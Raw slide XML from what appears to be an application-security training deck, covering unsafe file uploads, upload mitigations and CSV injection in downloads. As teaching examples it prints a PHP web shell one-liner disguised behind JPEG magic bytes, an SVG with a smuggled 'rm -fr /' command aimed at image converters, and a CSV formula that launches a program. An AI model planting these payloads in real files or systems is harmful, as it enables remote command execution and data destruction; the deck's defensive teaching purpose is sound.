                <a:sym typeface="Verdana"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="4A86E8"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:rPr>
              <a:t>&lt;pre&gt;&lt;?php passthru($_REQUEST['cmd'], $result); ?&gt;&lt;/pre&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1000">
              <a:solidFill>
                <a:srgbClr val="4A86E8"/>
              </a:solidFill>
              <a:latin typeface="Verdana"/>
              <a:ea typeface="Verdana"/>
              <a:cs typeface="Verdana"/>
              <a:sym typeface="Verdana"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" marR="0" lvl="0" indent="457200" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="54626A"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:rPr>
              <a:t>ÿØÿà = 0xffd8 0xffe0 = JPEG Start of Image marker (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>JPEG File Structure)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="54626A"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:srgbClr val="54626A"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" marR="0" lvl="0" indent="-228600" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1573" name="Google Shape;1573;p226"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="322850" y="470325"/>
            <a:ext cx="83535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Unsafe Upload Mitigations </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="363F44"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(that don’t work)</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="363F44"/>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227"/>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6BBF4E"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Helvetica Neue"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Don’t trust user supplied filenames</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" marR="0" lvl="1" indent="-304800" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6BBF4E"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Helvetica Neue"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Generate a random filename</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" marR="0" lvl="2" indent="-304800" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6BBF4E"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Helvetica Neue"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>It’ll be free of malicious paths and characters</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" marR="0" lvl="2" indent="-317500" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>It’ll be impossible for the attacker to guess</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" marR="0" lvl="1" indent="-304800" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6BBF4E"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Helvetica Neue"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Python: Use a method such as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" i="1"/>
              <a:t>werkzeug.utils.secure_filename()</a:t>
            </a:r>
            <a:endParaRPr i="1"/>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" marR="0" lvl="2" indent="-304800" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6BBF4E"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Helvetica Neue"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Similar protections to generating a random filename, except useful if you need to preserve the original filename. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" marR="0" lvl="0" indent="-304800" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Store uploaded files in non-executable locations</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" marR="0" lvl="1" indent="-304800" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Storing content in cloud storage, such as S3 or Google Cloud Storage, is safer than storing on the host filesystem</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" marR="0" lvl="1" indent="-304800" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Whitelist safe file paths, and use fully qualified file paths to prevent traversal</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" marR="0" lvl="1" indent="-304800" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>At a minimum, don’t store uploaded files in the webroot or other interpreted file paths</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1579" name="Google Shape;1579;p2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Safer Upload Mitigations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228"/>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a:t>Sandbox tools that evaluate user content</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" marR="0" lvl="1" indent="-304800" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Vulnerabilities can exist in backend tools and libraries. Processing user content can take advantage of those vulnerabilities</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" marR="0" lvl="1" indent="-304800" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>logo.svg:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="54626A"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;?xml version="1.0" standalone="no"?&gt;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="54626A"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="54626A"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	&lt;!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN"</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="54626A"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="54626A"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	"http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd";&gt;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="54626A"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="54626A"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	&lt;svg width="640px" height="480px" version="1.1"</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="54626A"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="54626A"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	xmlns="http://www.w3.org/2000/svg"; xmlns:xlink=</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="54626A"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="54626A"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	"http://www.w3.org/1999/xlink";&gt;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="54626A"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="54626A"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	&lt;image xlink:href="https://example.com/image.jpg&amp;quot;|rm &amp;quot;-fr&amp;quot;/"</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="54626A"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="54626A"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	x="0" y="0" height="640px" width="480px"/&gt;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="54626A"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="54626A"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	&lt;/svg&gt;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="54626A"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="54626A"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="54626A"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1585" name="Google Shape;1585;p2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Safer Upload Mitigations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229"/>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a:t>Sandbox tools that evaluate user content</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" marR="0" lvl="1" indent="-304800" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Vulnerabilities can exist in backend tools and libraries. Processing user content can take advantage of those vulnerabilities</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" marR="0" lvl="1" indent="-304800" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>logo.svg:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="54626A"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;?xml version="1.0" standalone="no"?&gt;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="54626A"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="54626A"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	&lt;!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN"</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="54626A"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="54626A"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	"http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd";&gt;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="54626A"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="54626A"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	&lt;svg width="640px" height="480px" version="1.1"</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="54626A"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="54626A"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	xmlns="http://www.w3.org/2000/svg"; xmlns:xlink=</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="54626A"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="54626A"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	"http://www.w3.org/1999/xlink";&gt;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="54626A"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="54626A"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	&lt;image xlink:href="https://example.com/image.jpg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&amp;quot;|rm &amp;quot;-fr&amp;quot;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="54626A"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="54626A"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="54626A"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	x="0" y="0" height="640px" width="480px"/&gt;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="54626A"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="54626A"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	&lt;/svg&gt;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="54626A"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:endParaRPr sz="1100">
              <a:solidFill>
                <a:srgbClr val="54626A"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" marR="0" lvl="1" indent="-304800" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="54626A"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Converting this to a PNG ($ convert logo.svg logo.png) will wipe your computer</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="54626A"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="54626A"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="54626A"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1591" name="Google Shape;1591;p2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Safer Upload Mitigations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230"/>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Unsafe Downloads</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1597" name="Google Shape;1597;p230"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="404800" y="1198725"/>
            <a:ext cx="7552800" cy="1663500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>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6BBF4E"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Helvetica Neue"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>If an attacker can control the contents of a downloaded file, they can insert malicious code</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" marR="0" lvl="0" indent="-304800" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6BBF4E"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Helvetica Neue"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>CSV Injection</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" marR="0" lvl="1" indent="-304800" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6BBF4E"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Helvetica Neue"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>CSV files are simple, comma separated values. If you insert an Excel macro into a CSV field, and open in Excel, Excel will happily execute the code </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" marR="0" lvl="2" indent="-304800" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6BBF4E"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Helvetica Neue"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="363F44"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Email, Name, Company, Role</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="363F44"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>julia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="363F44"/>
                </a:solidFill>
              </a:rPr>
              <a:t>@example</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="363F44"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>Julia Edwards</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="363F44"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>Example Inc, President</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="363F44"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="363F44"/>
                </a:solidFill>
              </a:rPr>
              <a:t>mike@example.com, M</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>ike Smith</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="363F44"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>“=2+5+cmd|' /C calc'!A0”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="363F44"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, Director</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="363F44"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" marR="0" lvl="0" indent="-228600" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>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Duo Presentation Deck New Bra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uo Presentation Deck New Bra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10199</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>On-screen Show (16:9)</PresentationFormat>
  <Paragraphs>981</Paragraphs>
  <Slides>151</Slides>
  <Notes>151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151</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="160" baseType="lpstr">
      <vt:lpstr>Verdana</vt:lpstr>
      <vt:lpstr>Consolas</vt:lpstr>
      <vt:lpstr>Courier New</vt:lpstr>
      <vt:lpstr>Helvetica Neue</vt:lpstr>
      <vt:lpstr>Source Code Pro</vt:lpstr>
      <vt:lpstr>Permanent Marker</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Duo Presentation Deck New Brand</vt:lpstr>
      <vt:lpstr>Duo Presentation Deck New Brand</vt:lpstr>
      <vt:lpstr>How to Best Use This Material...</vt:lpstr>
      <vt:lpstr>Available Lab Resources</vt:lpstr>
      <vt:lpstr>Additional Training Tips</vt:lpstr>
      <vt:lpstr>Introduction to  Application Security</vt:lpstr>
      <vt:lpstr>Secrets Management &amp; Configuration</vt:lpstr>
      <vt:lpstr>What Kind of Secrets Are Used Day-to-Day?</vt:lpstr>
      <vt:lpstr>Common Issues</vt:lpstr>
      <vt:lpstr>Sensu Admin</vt:lpstr>
      <vt:lpstr>Sensu Admin</vt:lpstr>
      <vt:lpstr>Sensu Admin</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Sensu Admin - Instagram Compromise</vt:lpstr>
      <vt:lpstr>Other Examples</vt:lpstr>
      <vt:lpstr>Committing Secrets to Source Control</vt:lpstr>
      <vt:lpstr>Storing Passwords</vt:lpstr>
      <vt:lpstr>Resetting Passwords</vt:lpstr>
      <vt:lpstr>Insecure Default Configurations </vt:lpstr>
      <vt:lpstr>MongoDB</vt:lpstr>
      <vt:lpstr>DEBUG Builds</vt:lpstr>
      <vt:lpstr>Mitigations</vt:lpstr>
      <vt:lpstr>Information Leakage</vt:lpstr>
      <vt:lpstr>What is Information Leakage?</vt:lpstr>
      <vt:lpstr>Information Leakage from Error Handling</vt:lpstr>
      <vt:lpstr>Information Leakage from Protocols</vt:lpstr>
